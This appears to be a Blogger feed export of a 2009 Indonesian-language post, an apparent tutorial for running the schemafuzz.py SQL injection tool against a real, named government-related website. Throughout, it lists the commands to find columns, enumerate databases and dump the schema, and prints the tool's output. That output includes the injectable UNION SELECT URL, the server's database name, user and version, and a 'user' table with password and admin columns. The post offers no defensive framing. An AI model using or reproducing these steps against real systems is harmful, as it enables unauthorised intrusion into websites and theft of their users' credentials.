tag:blogger.com,1999:blog-61787322969907620062011-04-21T22:36:03.299-07:00Dimas Triyonohttp://www.blogger.com/profile/01278409905596688599noreply@blogger.comBlogger11100tag:blogger.com,1999:blog-6178732296990762006.post-5527767871914006702009-02-10T00:22:00.000-08:002009-02-10T00:23:09.673-08:00<pre>1.Python (<a rel="nofollow" href="http://www.python.org/ftp/python/2.5/python-2.5.msi">http://www.python.org/ftp/python/2.5/python-2.5.msi</a>)<br />2.Schemafuzz (<a rel="nofollow" href="http://darkc0de.com/others/schemafuzz.py">http://darkc0de.com/others/schemafuzz.py</a>)<br />3.CMD<br /><br />Dg cmd masuk ke folder tempat schemafuzz.py berada...<br />Awali pertintah dengan format:<br />schemafuzz.py -u "url target" --perintah<br />List perintah ada dibawah...<br /><br /><br />1.Cari target<br />Misal: <a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1">http://www.ditplb.or.id/profile.php?id=1</a><br /><br />2.Masukkan perintah untuk mencari colom<br />Misal: schemafuzz.py -u "<a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1%22">http://www.ditplb.or.id/profile.php?id=1"</a>; --findcol<br />Maka keluar:<br />[+] URL: <a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1--">http://www.ditplb.or.id/profile.php?id=1--</a><br />[+]<br />Evasion Used: "+" "--"<br /><br />[+] 20:36:29<br /><br />[-] Proxy Not Given<br /><br />[+] Attempting To find the number of columns...<br /><br />[+] Testing: 0,1,2,<br />[+] Column Length is: 3<br /><br />[+] Found null column at column #: 2<br /><br />[+] SQLi URL:<br /><a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--">http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--</a><br /><br />[+] darkc0de<br />URL: <a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de">http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de</a><br />[-] Done!<br /><br /><br /><br />Berarti kita gunain<br /><a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de">http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de</a><br />untuk inject<br /><br />3.Cari database dg command --dbs<br />Misal : schemafuzz.py -u<br />"<a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de%22">http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"</a>;<br />--dbs<br />Maka keluar:<br />[+] URL:<br /><a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--">http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--</a><br /><br />[+] Evasion Used: "+" "--"<br /><br />[+] 20:39:32<br /><br />[-] Proxy Not Given<br /><br />[+] Gathering MySQL Server Configuration...<br /> <br />Database: t15618_plb <br />User: t15618_pl...@localhost<br /> <br />Version: 5.0.32-Debian_7etch8<br /><br />[+] Showing all databases current user has access too!<br /><br />[+] Number of Databases: 1<br /><br />[0] t15618_plb<br /><br /><br />[-] 20:39:39<br /><br />[-] Total URL Requests 3<br /><br />[-] Done<br /><br /><br />keliatan kan nama databasenya ??? t15618_plb<br /><br />4.Cari nama table dalam database<br />Misal: schemafuzz.py -u<br />"<a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de%22">http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"</a>;<br />--schema -D namadatabase<br />Jadinya: schemafuzz.py -u<br />"<a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de%22">http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"</a>;<br />--schema -D t15618_plb<br />Maka keluar:<br /><br />[+] URL:<br /><a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--">http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--</a><br /><br />[+] Evasion Used: "+" "--"<br /><br />[+] 20:43:10<br /><br />[-] Proxy Not Given<br />[+] Gathering MySQL Server Configuration...<br /><br />Database: t15618_plb<br /> <br />User: t15618_pl...@localhost<br /><br />Version: 5.0.32-Debian_7etch8<br />[+] Showing Tables &amp; Columns from database "t15618_plb"<br />[+] Number of Tables: 11<br />[Database]: t15618_plb<br />[Table: Columns]<br />[0]bukutamu: id,pengirim,email,pesan<br />[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim<br />[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan<br />[3]frm_kategori: id_kat,kategori<br />[4]kabupaten: ID_kab,ID_prop,Kabupaten<br />[5]pelatihan: ID,Pelatihan<br />[6]profile: ID_Profile,sinopsis,Profile<br />[7]propinsi: ID_prop,Propinsi<br />[8]sd: ID_sd,ID_1,SD,Detail<br />[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email<br />[10]user: ID_user,UserID,Password,Keterangan,Admin<br />[-] 20:44:39<br />[-] Total URL Requests 43<br />[-] Done<br /><br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6178732296990762006-552776787191400670?l=a-dwisatya.blogspot.com' alt='' /></div>Dimas Triyonohttp://www.blogger.com/profile/01278409905596688599noreply@blogger.com2